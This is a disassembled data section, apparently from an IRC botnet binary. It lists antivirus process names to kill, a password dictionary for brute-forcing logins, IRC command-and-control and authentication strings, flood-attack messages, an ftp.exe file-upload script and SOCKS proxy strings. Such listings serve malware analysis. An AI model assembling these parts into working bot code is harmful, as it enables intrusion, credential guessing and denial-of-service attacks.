aAvnt_exe db 'AVNT.EXE',0 ; DATA XREF: .text:0042EE0C�o
align 4
aAvltmain_exe db 'AVLTMAIN.EXE',0 ; DATA XREF: .text:0042EE08�o
align 4
aAvkwctl9_exe db 'AVKWCTl9.EXE',0 ; DATA XREF: .text:0042EE04�o
align 4
aAvkservice_exe db 'AVKSERVICE.EXE',0 ; DATA XREF: .text:0042EE00�o
align 4
aAvkserv_exe db 'AVKSERV.EXE',0 ; DATA XREF: .text:0042EDFC�o
aAvkpop_exe db 'AVKPOP.EXE',0 ; DATA XREF: .text:0042EDF8�o
align 4
aAvgw_exe db 'AVGW.EXE',0 ; DATA XREF: .text:0042EDF4�o
align 10h
aAvguard_exe db 'AVGUARD.EXE',0 ; DATA XREF: .text:0042EDF0�o
aAvgserv9_exe db 'AVGSERV9.EXE',0 ; DATA XREF: .text:0042EDEC�o
align 4
aAvgserv_exe db 'AVGSERV.EXE',0 ; DATA XREF: .text:0042EDE8�o
aAvgnt_exe db 'AVGNT.EXE',0 ; DATA XREF: .text:0042EDE4�o
align 4
aAvgctrl_exe db 'AVGCTRL.EXE',0 ; DATA XREF: .text:0042EDE0�o
aAvgcc32_exe db 'AVGCC32.EXE',0 ; DATA XREF: .text:0042EDDC�o
aAve32_exe db 'AVE32.EXE',0 ; DATA XREF: .text:0042EDD8�o
align 4
aAvconsol_exe db 'AVCONSOL.EXE',0 ; DATA XREF: .text:0042EDD4�o
align 4
aAutoupdate_exe db 'AUTOUPDATE.EXE',0 ; DATA XREF: .text:0042EDD0�o
align 4
aAutotrace_exe db 'AUTOTRACE.EXE',0 ; DATA XREF: .text:0042EDCC�o
align 4
aAutodown_exe db 'AUTODOWN.EXE',0 ; DATA XREF: .text:0042EDC8�o
align 4
aAupdate_exe db 'AUPDATE.EXE',0 ; DATA XREF: .text:0042EDC4�o
aAu_exe db 'AU.EXE',0 ; DATA XREF: .text:0042EDC0�o
align 4
aAtwatch_exe db 'ATWATCH.EXE',0 ; DATA XREF: .text:0042EDBC�o
aAtupdater_exe db 'ATUPDATER.EXE',0 ; DATA XREF: .text:0042EDB4�o
; .text:0042EDB8�o
align 4
aAtro55en_exe db 'ATRO55EN.EXE',0 ; DATA XREF: .text:0042EDB0�o
align 4
aAtguard_exe db 'ATGUARD.EXE',0 ; DATA XREF: .text:0042EDAC�o
aAtcon_exe db 'ATCON.EXE',0 ; DATA XREF: .text:0042EDA8�o
align 10h
aArr_exe db 'ARR.EXE',0 ; DATA XREF: .text:0042EDA4�o
aApvxdwin_exe db 'APVXDWIN.EXE',0 ; DATA XREF: .text:0042EDA0�o
align 4
aAplica32_exe db 'APLICA32.EXE',0 ; DATA XREF: .text:0042ED9C�o
align 4
aApimonitor_exe db 'APIMONITOR.EXE',0 ; DATA XREF: .text:0042ED98�o
align 4
aAnts_exe db 'ANTS.EXE',0 ; DATA XREF: .text:0042ED94�o
align 4
aAntivirus_exe db 'ANTIVIRUS.EXE',0 ; DATA XREF: .text:0042ED90�o
align 4
aAntiTrojan_exe db 'ANTI-TROJAN.EXE',0 ; DATA XREF: .text:0042ED8C�o
aAmon9x_exe db 'AMON9X.EXE',0 ; DATA XREF: .text:0042ED88�o
align 10h
aAlogserv_exe db 'ALOGSERV.EXE',0 ; DATA XREF: .text:0042ED84�o
align 10h
aAlevir_exe db 'ALEVIR.EXE',0 ; DATA XREF: .text:0042ED80�o
align 4
aAlertsvc_exe db 'ALERTSVC.EXE',0 ; DATA XREF: .text:0042ED7C�o
align 4
aAgentw_exe db 'AGENTW.EXE',0 ; DATA XREF: .text:0042ED78�o
align 4
aAgentsvr_exe db 'AGENTSVR.EXE',0 ; DATA XREF: .text:0042ED74�o
align 4
aAdvxdwin_exe db 'ADVXDWIN.EXE',0 ; DATA XREF: .text:0042ED70�o
align 4
aAdaware_exe db 'ADAWARE.EXE',0 ; DATA XREF: .text:0042ED6C�o
aAckwin32_exe db 'ACKWIN32.EXE',0 ; DATA XREF: .text:off_42ED68�o
align 4
aCannotExtractP db 'Cannot extract process path for %s',0Ah,0 ; DATA XREF: sub_408D07+2D7�o
aFileDeletedS_ db '[FILE]: Deleted ',27h,'%s',27h,'.',0Ah,0 ; DATA XREF: sub_408D07+2C9�o
align 10h
aCouldNotDelete db 'Could not delete ',27h,'%s',27h,'.!',0Ah,0 ; DATA XREF: sub_408D07+2BB�o
align 4
aSD_0 db ' %s (%d)',0 ; DATA XREF: sub_408D07+187�o
align 4
aProcProcessL_0 db '[PROC]: Process list failed.',0 ; DATA XREF: sub_40901A:loc_40909B�o
align 4
aProcProcessLis db '[PROC]: Process list completed.',0 ; DATA XREF: sub_40901A+7A�o
aProcListingPro db '[PROC]: Listing processes:',0 ; DATA XREF: sub_40901A+2A�o
align 4
aHttp_0 db 'HTTP',0 ; DATA XREF: .text:0042F754�o
align 4
aFtp db 'FTP',0 ; DATA XREF: .text:0042F750�o
off_4276F0 dd offset byte_435249 ; DATA XREF: .text:0042F74C�o
dword_4276F4 dd 544F42h aPsniffErrorRec db '[PSNIFF]: Error: recv() failed, returned: <%d>',0
; DATA XREF: sub_40913E+28E�o
align 4
aPsniffSuspicio db '[PSNIFF]: Suspicious %s packet from: %s:%d - %s.',0
; DATA XREF: sub_40913E+21B�o
align 4
aPsniff_0 db '[PSNIFF]',0 ; DATA XREF: sub_40913E+1A5�o
align 4
aPsniffErrorWsa db '[PSNIFF]: Error: WSAIoctl() failed, returned: <%d>.',0
; DATA XREF: sub_40913E+15D�o
aPsniffErrorBin db '[PSNIFF]: Error: bind() failed, returned: <%d>.',0
; DATA XREF: sub_40913E+F1�o
aPsniffErrorSoc db '[PSNIFF]: Error: socket() failed, returned: <%d>.',0
; DATA XREF: sub_40913E+7C�o
align 10h
aIntranet db 'intranet',0 ; DATA XREF: .text:0043018C�o
align 4
aLan db 'lan',0 ; DATA XREF: .text:00430184�o
aMain db 'main',0 ; DATA XREF: .text:00430180�o
align 4
aWinpass db 'winpass',0 ; DATA XREF: .text:0043017C�o
aBlank db 'blank',0 ; DATA XREF: .text:00430178�o
align 4
aOffice db 'office',0 ; DATA XREF: .text:00430174�o
align 10h
aControl db 'control',0 ; DATA XREF: .text:00430170�o
aXp db 'xp',0 ; DATA XREF: .text:0043016C�o
align 4
aNokia db 'nokia',0 ; DATA XREF: .text:00430168�o
align 4
aHp db 'hp',0 ; DATA XREF: .text:00430164�o
align 4
aSiemens db 'siemens',0 ; DATA XREF: .text:00430160�o
aCompaq db 'compaq',0 ; DATA XREF: .text:0043015C�o
align 4
aDell db 'dell',0 ; DATA XREF: .text:00430158�o
align 10h
aCisco db 'cisco',0 ; DATA XREF: .text:00430154�o
align 4
aIbm db 'ibm',0 ; DATA XREF: .text:00430150�o
aOrainstall db 'orainstall',0 ; DATA XREF: .text:00430148�o
align 4
aSqlpassoainsta db 'sqlpassoainstall',0 ; DATA XREF: .text:00430144�o
align 4
aSql db 'sql',0 ; DATA XREF: .text:00430140�o
aSa db 'sa',0 ; DATA XREF: sub_409806+185B�o
; .text:0043013C�o
align 4
aDb1234 db 'db1234',0 ; DATA XREF: .text:00430138�o
align 4
aDb1 db 'db1',0 ; DATA XREF: .text:00430130�o
aDatabasepasswo db 'databasepassword',0 ; DATA XREF: .text:0043012C�o
align 4
aData db 'data',0 ; DATA XREF: .text:00430128�o
align 4
aDatabasepass db 'databasepass',0 ; DATA XREF: .text:00430124�o
align 4
aDbpassword db 'dbpassword',0 ; DATA XREF: .text:00430120�o
align 4
aDbpass db 'dbpass',0 ; DATA XREF: .text:0043011C�o
align 10h
aAccess db 'access',0 ; DATA XREF: .text:00430118�o
align 4
aDomainpassword db 'domainpassword',0 ; DATA XREF: .text:00430110�o
align 4
aDomainpass db 'domainpass',0 ; DATA XREF: .text:0043010C�o
align 4
aDomain db 'domain',0 ; DATA XREF: .text:00430108�o
align 4
aHello db 'hello',0 ; DATA XREF: .text:00430104�o
align 4
aHell_0 db 'hell',0 ; DATA XREF: .text:00430100�o
align 4
aGod db 'god',0 ; DATA XREF: .text:004300FC�o
aSex db 'sex',0 ; DATA XREF: .text:004300F8�o
aSlut db 'slut',0 ; DATA XREF: .text:004300F4�o
align 4
aBitch db 'bitch',0 ; DATA XREF: .text:004300F0�o
align 4
aFuck db 'fuck',0 ; DATA XREF: .text:004300EC�o
align 4
aExchange db 'exchange',0 ; DATA XREF: .text:004300E8�o
align 4
aBackup db 'backup',0 ; DATA XREF: .text:004300E4�o
align 10h
aTechnical db 'technical',0 ; DATA XREF: .text:004300E0�o
align 4
aLoginpass db 'loginpass',0 ; DATA XREF: .text:004300DC�o
align 4
aLogin db 'login',0 ; DATA XREF: sub_409806+7BB�o
; .text:004300D8�o
align 10h
aMary db 'mary',0 ; DATA XREF: .text:004300D4�o
align 4
aKatie db 'katie',0 ; DATA XREF: .text:004300D0�o
align 10h
aKate db 'kate',0 ; DATA XREF: .text:004300C8�o
align 4
aGeorge db 'george',0 ; DATA XREF: .text:004300C4�o
align 10h
aEric db 'eric',0 ; DATA XREF: .text:004300C0�o
align 4
aChris db 'chris',0 ; DATA XREF: .text:004300BC�o
align 10h
aIan db 'ian',0 ; DATA XREF: .text:004300B8�o
aNeil db 'neil',0 ; DATA XREF: .text:004300B4�o
align 4
aLee db 'lee',0 ; DATA XREF: .text:004300B0�o
aBrian db 'brian',0 ; DATA XREF: .text:004300AC�o
align 4
aSusan db 'susan',0 ; DATA XREF: .text:004300A4�o
align 10h
aSue db 'sue',0 ; DATA XREF: .text:004300A0�o
aSam db 'sam',0 ; DATA XREF: .text:0043009C�o
aLuke db 'luke',0 ; DATA XREF: .text:00430098�o
align 10h
aPeter db 'peter',0 ; DATA XREF: .text:00430094�o
; .text:004300A8�o
align 4
aJohn db 'john',0 ; DATA XREF: .text:00430090�o
align 10h
aMike db 'mike',0 ; DATA XREF: .text:0043008C�o
align 4
aBill db 'bill',0 ; DATA XREF: .text:00430088�o
align 10h
aFred db 'fred',0 ; DATA XREF: .text:00430084�o
align 4
aJoe db 'joe',0 ; DATA XREF: .text:00430080�o
aJen db 'jen',0 ; DATA XREF: .text:0043007C�o
aBob db 'bob',0 ; DATA XREF: .text:00430078�o
; .text:004300CC�o
aQwe db 'qwe',0 ; DATA XREF: .text:00430074�o
aZxc db 'zxc',0 ; DATA XREF: .text:00430070�o
aAsd db 'asd',0 ; DATA XREF: .text:0043006C�o
aQaz db 'qaz',0 ; DATA XREF: .text:00430068�o
aWin2000 db 'win2000',0 ; DATA XREF: .text:00430064�o
aWinnt db 'winnt',0 ; DATA XREF: .text:00430060�o
align 4
aWinxp db 'winxp',0 ; DATA XREF: .text:off_43005C�o
align 4
aWin2k db 'win2k',0 ; DATA XREF: .text:00430058�o
align 4
aWin98 db 'win98',0 ; DATA XREF: .text:00430054�o
align 4
aWindows db 'windows',0 ; DATA XREF: .text:00430050�o
aOeminstall db 'oeminstall',0 ; DATA XREF: .text:0043004C�o
align 10h
aOemuser db 'oemuser',0 ; DATA XREF: .text:00430048�o
aOem db 'oem',0 ; DATA XREF: .text:00430044�o
aUser db 'user',0 ; DATA XREF: sub_409806+2029�o
; .text:00430040�o
align 4
aHomeuser db 'homeuser',0 ; DATA XREF: .text:0043003C�o
align 10h
aHome db 'home',0 ; DATA XREF: .text:00430038�o
align 4
aAccounting db 'accounting',0 ; DATA XREF: .text:00430034�o
align 4
aAccounts db 'accounts',0 ; DATA XREF: .text:00430030�o
align 10h
aInternet db 'internet',0 ; DATA XREF: .text:0043002C�o
; .text:00430188�o
align 4
aWww db 'www',0 ; DATA XREF: .text:00430028�o
aWeb db 'web',0 ; DATA XREF: .text:00430024�o
aOutlook db 'outlook',0 ; DATA XREF: .text:00430020�o
aMail db 'mail',0 ; DATA XREF: .text:0043001C�o
align 4
aQwerty db 'qwerty',0 ; DATA XREF: .text:00430018�o
align 4
aNull_0 db 'null',0 ; DATA XREF: .text:00430014�o
align 4
aServer db 'server',0 ; DATA XREF: sub_409806+19E9�o
; .text:0043000C�o
align 4
aSystem db 'system',0 ; DATA XREF: .text:00430008�o
align 4
aChangeme db 'changeme',0 ; DATA XREF: .text:00430000�o
align 10h
aLinux db 'linux',0 ; DATA XREF: .text:0042FFFC�o
align 4
aUnix db 'unix',0 ; DATA XREF: .text:0042FFF8�o
align 10h
aDemo db 'demo',0 ; DATA XREF: .text:0042FFF4�o
align 4
aNone db 'none',0 ; DATA XREF: .text:0042FFF0�o
align 10h
aTest db 'test',0 ; DATA XREF: .text:0042FFE8�o
align 4
a2004 db '2004',0 ; DATA XREF: .text:0042FFE4�o
align 10h
a2003 db '2003',0 ; DATA XREF: sub_412AEE+98�o
; .text:0042FFE0�o
align 4
a2002 db '2002',0 ; DATA XREF: .text:0042FFDC�o
align 10h
a2001 db '2001',0 ; DATA XREF: .text:0042FFD8�o
align 4
a2000 db '2000',0 ; DATA XREF: .text:0042FFD4�o
align 10h
a1234567890 db '1234567890',0 ; DATA XREF: .text:0042FFD0�o
align 4
a123456789 db '123456789',0 ; DATA XREF: .text:0042FFCC�o
align 4
a12345678 db '12345678',0 ; DATA XREF: .text:0042FFC8�o
align 4
a1234567 db '1234567',0 ; DATA XREF: .text:0042FFC4�o
a123456 db '123456',0 ; DATA XREF: .text:0042FFC0�o
align 4
a12345 db '12345',0 ; DATA XREF: .text:0042FFBC�o
align 4
a1234 db '1234',0 ; DATA XREF: .text:0042FFB8�o
align 4
a123 db '123',0 ; DATA XREF: .text:0042FFB4�o
a12 db '12',0 ; DATA XREF: .text:0042FFB0�o
align 4
a1: ; DATA XREF: .text:0042FFAC�o
unicode 0, <1>,0
a007 db '007',0 ; DATA XREF: .text:0042FFA8�o
aPwd db 'pwd',0 ; DATA XREF: .text:0042FFA4�o
aPass_0 db 'pass',0 ; DATA XREF: .text:0042FFA0�o
align 10h
aPass1234 db 'pass1234',0 ; DATA XREF: .text:0042FF9C�o
align 4
aPasswd db 'passwd',0 ; DATA XREF: .text:0042FF98�o
align 4
aPassword db 'password',0 ; DATA XREF: .text:0042FF94�o
align 10h
aPassword1 db 'password1',0 ; DATA XREF: .text:0042FF90�o
align 4
aAdm db 'adm',0 ; DATA XREF: .text:0042FF8C�o
aDb2 db 'db2',0 ; DATA XREF: .text:0042FF68�o
; .text:00430134�o
aOracle db 'oracle',0 ; DATA XREF: .text:0042FF64�o
; .text:0043014C�o
align 4
aDba db 'dba',0 ; DATA XREF: .text:0042FF60�o
aDatabase db 'database',0 ; DATA XREF: .text:0042FF5C�o
; .text:00430114�o
align 4
aDefault db 'default',0 ; DATA XREF: .text:0042FF58�o
; .text:00430004�o
aGuest_0 db 'guest',0 ; DATA XREF: .text:0042FF54�o
; .text:0042FFEC�o
align 4
aWwwadmin db 'wwwadmin',0 ; DATA XREF: .text:0042FF50�o
align 4
aTeacher db 'teacher',0 ; DATA XREF: .text:0042FF4C�o
; .text:00430194�o
aStudent db 'student',0 ; DATA XREF: .text:0042FF48�o
; .text:00430190�o
aOwner db 'owner',0 ; DATA XREF: .text:0042FF44�o
align 10h
aComputer db 'computer',0 ; DATA XREF: .text:0042FF40�o
align 4
aRoot db 'root',0 ; DATA XREF: .text:0042FF3C�o
; .text:00430010�o
align 4
aStaff db 'staff',0 ; DATA XREF: .text:0042FF38�o
; .text:00430198�o
align 4
aAdmin db 'admin',0 ; DATA XREF: .text:0042FF34�o
; .text:0042FF88�o
align 4
aAdmins db 'admins',0 ; DATA XREF: .text:0042FF30�o
; .text:0042FF84�o
align 4
aAdministrat db 'administrat',0 ; DATA XREF: .text:0042FF2C�o
; .text:0042FF80�o
aAdministrateur db 'administrateur',0 ; DATA XREF: .text:0042FF28�o
; .text:0042FF7C�o
align 4
aAdministrador db 'administrador',0 ; DATA XREF: .text:0042FF24�o
; .text:0042FF78�o
align 4
aAdministrato_0 db 'administrator',0 ; DATA XREF: .text:off_42FF20�o
; .text:0042FF74�o
align 4
aJpilotIrcJavaC db 'JPilot IRC Java Client 2.32',0 ; DATA XREF: .text:0042FE74�o
aEggdrop1_3_24i db 'Eggdrop 1.3.24i (c)1997 Robey Pointer',0 ; DATA XREF: .text:0042FE70�o
align 4
aIrcle3_0b10UsP db 'Ircle 3.0b10 US PPC 12/15/1997 21:07:34 PM. #239C23AF21B',0
; DATA XREF: .text:0042FE6C�o
align 4
aQuarterdeckGlo db 'Quarterdeck Global Chat 1.2.9 for Macintosh',0
; DATA XREF: .text:0042FE68�o
align 8
aAmircAmigaos2_ db 'AmIRC/AmigaOS 2.0.4 by Oliver Wagner <owagner@vapor.com> : http:/'
; DATA XREF: .text:0042FE64�o
db '/www.vapor.com/ : [#0000D63F] : The slow mess client',0
align 10h
aXirconB4Doot_3 db 'xircon[b4] + doot.3b[pawt] be-two + anony(v1) + aolsay(impulse) +'
; DATA XREF: .text:0042FE60�o
db ' deepthought + saq(dbg)',0
align 10h
aOsiris1cBitchx db 'osiris-1c/bitchx-75p1 + autobot(bx) p3x3 : that time then and onc'
; DATA XREF: .text:0042FE5C�o
db 'e again..',0
align 10h
aIrcn7_0rc_67_0 db 'ircN 7.0rc.6 + 7.0rc.5 + 7.0rc.4 for mIRC - the devils of truth s'
; DATA XREF: .text:0042FE58�o
db 'teal the souls of the free -',0
align 10h
aIrcn6_03ForMir db 'ircN 6.03 for mIRC - are we being punished for fate -',0
; DATA XREF: .text:0042FE54�o
align 4
aWsirc2_03RCopy db 'WSIRC 2.03-R - CopyRight 1994, 1995 Caesar M Samsi csamsi@clark.n'
; DATA XREF: .text:0042FE50�o
db 'et TEXT CHANNEL',0
align 10h
aHydraircV0_3_1 db 'HydraIRC v0.3.133-Test (14/March/2004) by Dominic Clifton aka Hyd'
; DATA XREF: .text:0042FE4C�o
db 'ra - #HydraIRC on EFNet',0
align 4
aCBasedIrcClien db 'C++ based IRC Client by Jumpincow/shaxxxa/mo00',0
; DATA XREF: .text:0042FE48�o
align 10h
aStormbot_tcl3_ db 'StormBot.TCL 3.1.beta.2.10 by Xone & Domino (coders@stormbot.org)'
; DATA XREF: .text:0042FE44�o
db 0
align 4
aEggdropV1_6_13 db 'eggdrop v1.6.13',0 ; DATA XREF: .text:0042FE40�o
aEggdropV1_6_15 db 'eggdrop v1.6.15',0 ; DATA XREF: .text:0042FE3C�o
aMirc32V1_0K_ma db 'mIRC32 v1.0 K .Mardam-Bey',0 ; DATA XREF: .text:0042FE38�o
align 10h
aMircV6_14K_mar db 'mIRC v6.14 K.Mardam-Bey',0 ; DATA XREF: .text:0042FE34�o
aMircV6_12K_mar db 'mIRC v6.12 K.Mardam-Bey',0 ; DATA XREF: .text:0042FE30�o
aMircV6_10K_mar db 'mIRC v6.10 K.Mardam-Bey',0 ; DATA XREF: .text:0042FE2C�o
aMircV6_1K_mard db 'mIRC v6.1 K.Mardam-Bey',0 ; DATA XREF: .text:0042FE20�o
align 10h
aMircV6_03K_mar db 'mIRC v6.03 K.Mardam-Bey',0 ; DATA XREF: .text:0042FE1C�o
; .text:0042FE28�o
aMircV6_01K_mar db 'mIRC v6.01 K.Mardam-Bey',0 ; DATA XREF: .text:0042FE18�o
; .text:0042FE24�o
aMircV5_82K_mar db 'mIRC v5.82 K.Mardam-Bey',0 ; DATA XREF: .text:0042FE14�o
aMircV5_71K_mar db 'mIRC v5.71 K.Mardam-Bey',0 ; DATA XREF: .text:0042FE10�o
aMirc32V6_12K_m db 'mIRC32 v6.12 K.Mardam-Bey',0 ; DATA XREF: .text:0042FE0C�o
align 4
aMirc32V6_03K_m db 'mIRC32 v6.03 K.Mardam-Bey',0 ; DATA XREF: .text:0042FE08�o
align 4
aMirc32V6_01K_m db 'mIRC32 v6.01 K.Mardam-Bey',0 ; DATA XREF: .text:0042FE04�o
align 4
aMirc32V5_82K_m db 'mIRC32 v5.82 K.Mardam-Bey',0 ; DATA XREF: .text:0042FE00�o
align 10h
aMirc32V5_71K_m db 'mIRC32 v5.71 K.Mardam-Bey',0 ; DATA XREF: .text:0042FDFC�o
align 4
aIrssiV0_8_4Run db 'irssi v0.8.4 - running on Linux i686',0 ; DATA XREF: .text:0042FDF8�o
align 4
aIrcn7_277_0Eve db 'ircN 7.27 + 7.0 - everyone i know goes away in the end -',0
; DATA XREF: .text:0042FDF4�o
align 10h
aXchat1_8_10Lin db 'xchat 1.8.10 Linux 2.4.25p1mp [i686/501MHz]',0
; DATA XREF: .text:0042FDF0�o
aIrcii2_9_baseO db 'ircII 2.9_base OSF1 V4.0 :ircii 2.8: almost there...',0
; DATA XREF: .text:0042FDEC�o
align 4
aIrcii2_8_2Suno db 'ircII 2.8.2 SunOS 5.6 :ircii 2.8: almost there...',0
; DATA XREF: .text:0042FDE8�o
align 4
aIrcii2_9Bitchx db 'ircII 2.9-BitchX-60 Linux 1.2.8 :bitZ%summer ',27h,'96(bitX%summer',27h
; DATA XREF: .text:0042FDE4�o
db '96)',0
align 10h
aIrciiEpic4pre2 db 'ircII EPIC4pre2 SunOS 5.6 - cypher(beta\one) -myd!nas :one step c'
; DATA XREF: .text:0042FDE0�o
db 'loser to world domination',0
align 4
aIrciiEpic4pr_0 db 'ircII EPIC4pre2 Linux 2.0.34 - Accept no limitations.',0
; DATA XREF: .text:0042FDDC�o
align 8
aBx_75p1Linux2_ db '[bx.75p1] linux 2.0.36 [embryonic.22b3] :what is this that stands'
; DATA XREF: .text:0042FDD8�o
db ' before me',0
align 8
aBitchx1_0c18By db 'BitchX-1.0c18+ by panasync - IRIX 6.5.10 Silicon Graphics : Keep '
; DATA XREF: .text:0042FDD4�o
db 'it to yourself!',0
align 10h
aBitchx74p21_3f db 'BitchX-74p2+1.3f/SunOS 5.6 :(c)rackrock/bX [3.0.18] : Keep it to'
; DATA XREF: .text:0042FDD0�o
db ' yourself!',0
align 10h
aBitchx1_0c19By db 'BitchX-1.0c19+ by panasync - FreeBSD 4.10-BETA : Keep it to yours'
; DATA XREF: .text:0042FDCC�o
db 'elf!',0
align 4
aBitchx70alpha1 db 'BitchX-70alpha14+tcl by panasync - Linux 2.0.27 Keep it to yours'
; DATA XREF: .text:0042FDC8�o
db 'elf!',0
align 10h
a__Argon1gBitch db '..(argon/1g) :bitchx-75 : Keep it to yourself!',0
; DATA XREF: .text:0042FDC4�o
align 10h
aBitchx74p2ByPa db 'BitchX-74p2+ by panasync - CYGWIN32/95 4.0 : Keep it to yourself!'
; DATA XREF: .text:0042FDC0�o
db 0
align 4
aMircV6_03Khale db 'mIRC v6.03 Khaled Mardam-Bey',0 ; DATA XREF: .text:0042FDBC�o
align 4
aMircV6_12Khale db 'mIRC v6.12 Khaled Mardam-Bey',0 ; DATA XREF: .text:off_42FDB8�o
align 4
a@celestial_org db '*@celestial.org',0 ; DATA XREF: .text:off_42FDB4�o
asc_4285C4: ; DATA XREF: sub_40942B+129�o
; sub_40942B+1AD�o
unicode 0, <|>,0
asc_4285C8 db ' :',0 ; DATA XREF: sub_40942B:loc_40950B�o
; sub_409806+7D�o ...
align 4
aNickSUserS00S db 'NICK %s',0Dh,0Ah ; DATA XREF: sub_40942B+62�o
db 'USER %s 0 0 :%s',0Dh,0Ah,0
align 4
aPassS db 'PASS %s',0Dh,0Ah,0 ; DATA XREF: sub_40942B+38�o
align 4
aMainConnectedT db '[MAIN]: Connected to %s.',0 ; DATA XREF: sub_4096A7+9F�o
align 10h
aModeSS db 'MODE %s %s',0Dh,0Ah,0 ; DATA XREF: sub_409806+629A�o
align 10h
aUserhostS db 'USERHOST %s',0Dh,0Ah,0 ; DATA XREF: sub_409806+6285�o
align 10h
aMainUserSLog_1 db '[MAIN]: User: %s logged in.',0 ; DATA XREF: sub_409806+6271�o
aMainPasswordAc db '[MAIN]: Password accepted.',0 ; DATA XREF: sub_409806+6254�o
align 4
aMainFailedHost db '[MAIN]: *Failed host auth by: (%s!%s).',0 ; DATA XREF: sub_409806+61DC�o
align 10h
aNoticeSHostAut db 'NOTICE %s :Host Auth failed (%s!%s).',0Dh,0Ah,0
; DATA XREF: sub_409806+61B9�o
align 4
aMainFailedPass db '[MAIN]: *Failed pass auth by: (%s!%s).',0 ; DATA XREF: sub_409806+6175�o
align 10h
aNoticeSYourAtt db 'NOTICE %s :Your attempt has been logged.',0Dh,0Ah,0
; DATA XREF: sub_409806+6166�o
; sub_409806+61CD�o
align 4
aNoticeSPassAut db 'NOTICE %s :Pass auth failed (%s!%s).',0Dh,0Ah,0
; DATA XREF: sub_409806+6152�o
align 4
asc_428734: ; DATA XREF: sub_409806+6100�o
unicode 0, <~>,0
dword_428738 dd 0 aMainRandomNick db '[MAIN]: Random nick change: %s',0 ; DATA XREF: sub_409806+60B0�o
align 4
aStoppingPrevio db 'Stopping previous scans',0 ; DATA XREF: sub_409806+5F08�o
aScanFailedTo_2 db '[SCAN]: Failed to start scan, no IP specified.',0
; DATA XREF: sub_409806+5E37�o
align 4
aUdpFailedToSta db '[UDP]: Failed to start flood thread, error: <%d>.',0
; DATA XREF: sub_409806+5C42�o
align 4
aUdpSendingDPac db '[UDP]: Sending %d packets to: %s. Packet size: %d, Delay: %d(ms).'
; DATA XREF: sub_409806+5BDD�o
db 0
align 4
aIcmp_dllNotAva db 'ICMP.dll not available',0 ; DATA XREF: sub_409806+5B16�o
align 4
aPingFailedToSt db '[PING]: Failed to start flood thread, error: <%d>.',0
; DATA XREF: sub_409806+5AEC�o
align 4
aPingSendingDPi db '[PING]: Sending %d pings to %s. packet size: %d, timeout: %d(ms).'
; DATA XREF: sub_409806+5A91�o
db 0
align 4
aTcpInvalidFl_0 db '[TCP]: Invalid flood time must be greater than 0.',0
; DATA XREF: sub_409806:loc_40F1D1�o
align 10h
aTcpFailedToSta db '[TCP]: Failed to start flood thread, error: <%d>.',0
; DATA XREF: sub_409806+59AF�o
align 4
aTcpSSFloodingS db '[TCP]: %s %s flooding: (%s:%s) for %s seconds.',0
; DATA XREF: sub_409806+5949�o
align 4
aNormal db 'Normal',0 ; DATA XREF: sub_409806+593B�o
align 4
aSpoofed db 'Spoofed',0 ; DATA XREF: sub_409806+5934�o
aTcpInvalidFloo db '[TCP]: Invalid flood type specified.',0 ; DATA XREF: sub_409806+5885�o
align 4
aRandom_0 db 'random',0 ; DATA XREF: sub_409806+5879�o
; sub_412E0B+229�o
align 4
aAck db 'ack',0 ; DATA XREF: sub_409806+5865�o
; sub_412E0B+209�o
aFtpUploading_0 db '[FTP]: Uploading file: %s to: %s failed.',0
; DATA XREF: sub_409806:loc_40EF91�o
align 4
aFtpUploadingFi db '[FTP]: Uploading file: %s to: %s',0 ; DATA XREF: sub_409806+5784�o
align 4
aFtp_exe db 'ftp.exe',0 ; DATA XREF: sub_409806+576D�o
aSS_4 db '-s:%s',0 ; DATA XREF: sub_409806+5754�o
align 4
aOpenSSSSPutSBy db 'open %s',0Dh,0Ah ; DATA XREF: sub_409806+5734�o
db '%s',0Dh,0Ah
db '%s',0Dh,0Ah
db '%s',0Dh,0Ah
db 'put %s',0Dh,0Ah
db 'bye',0Dh,0Ah,0
align 4
aSIII_dll db '%s\%i%i%i.dll',0 ; DATA XREF: sub_409806+56F0�o
align 4
aFtpFileNotFoun db '[FTP]: File not found: %s.',0 ; DATA XREF: sub_409806+5697�o
align 4
aUpload db 'upload',0 ; DATA XREF: sub_409806+5671�o
align 10h
aHcon db 'hcon',0 ; DATA XREF: sub_409806+5650�o
align 4
aHttpcon db 'httpcon',0 ; DATA XREF: sub_409806+563C�o
aMainInvalidLog db '[MAIN]: Invalid login slot number: %d.',0 ; DATA XREF: sub_409806+5576�o
align 4
aMainNoUserLogg db '[MAIN]: No user logged in at slot: %d.',0 ; DATA XREF: sub_409806+556E�o
align 10h
aMainS db '[MAIN]: %s',0 ; DATA XREF: sub_409806+550C�o
align 4
aSecureFailedTo db '[SECURE]: Failed to start secure thread, error: <%d>.',0
; DATA XREF: sub_409806+54E8�o
; sub_40FAD0+3DE�o
align 4
aSecureSSystem_ db '[SECURE]: %s system.',0 ; DATA XREF: sub_409806+5484�o
align 4
aUnsecuring db 'Unsecuring',0 ; DATA XREF: sub_409806+547E�o
align 4
aSecuring db 'Securing',0 ; DATA XREF: sub_409806+5477�o
align 4
aSocks4FailedTo db '[SOCKS4]: Failed to start server thread, error: <%d>.',0
; DATA XREF: sub_409806+53E9�o
align 4
aSocks4ServerSt db '[SOCKS4]: Server started on: %s:%d.',0 ; DATA XREF: sub_409806+5390�o
; sub_412412+A1�o
aFindfile_0 db '[FINDFILE]',0 ; DATA XREF: sub_409806+52C2�o
align 4
aFindFile db 'Find file',0 ; DATA XREF: sub_409806+52BD�o
align 4
aProc db '[PROC]',0 ; DATA XREF: sub_409806+52AD�o
align 10h
aProcessList db 'Process list',0 ; DATA XREF: sub_409806+52A8�o
align 10h
aMainReconnecti db '[MAIN]: Reconnecting.',0 ; DATA XREF: sub_409806+5272�o
align 4
aQuitReconnecti db 'QUIT :reconnecting',0Dh,0Ah,0 ; DATA XREF: sub_409806:loc_40EA6B�o
align 10h
aMainDisconnect db '[MAIN]: Disconnecting.',0 ; DATA XREF: sub_409806+5250�o
align 4
aQuitDisconnect db 'QUIT :disconnecting',0Dh,0Ah,0 ; DATA XREF: sub_409806:loc_40EA49�o
align 10h
aQuitS db 'QUIT :%s',0Dh,0Ah,0 ; DATA XREF: sub_409806+521A�o
align 4
aMainStatusRead db '[MAIN]: Status: Ready. Bot Uptime: %s.',0 ; DATA XREF: sub_409806+51CC�o
align 4
aMainBotIdS_ db '[MAIN]: Bot ID: %s.',0 ; DATA XREF: sub_409806+518D�o
aThreadsFaile_0 db '[THREADS]: Failed to start list thread, error: <%d>.',0
; DATA XREF: sub_409806+5163�o
align 10h
aThreadsListThr db '[THREADS]: List threads.',0 ; DATA XREF: sub_409806+5108�o
align 4
aSub db 'sub',0 ; DATA XREF: sub_409806+50E6�o
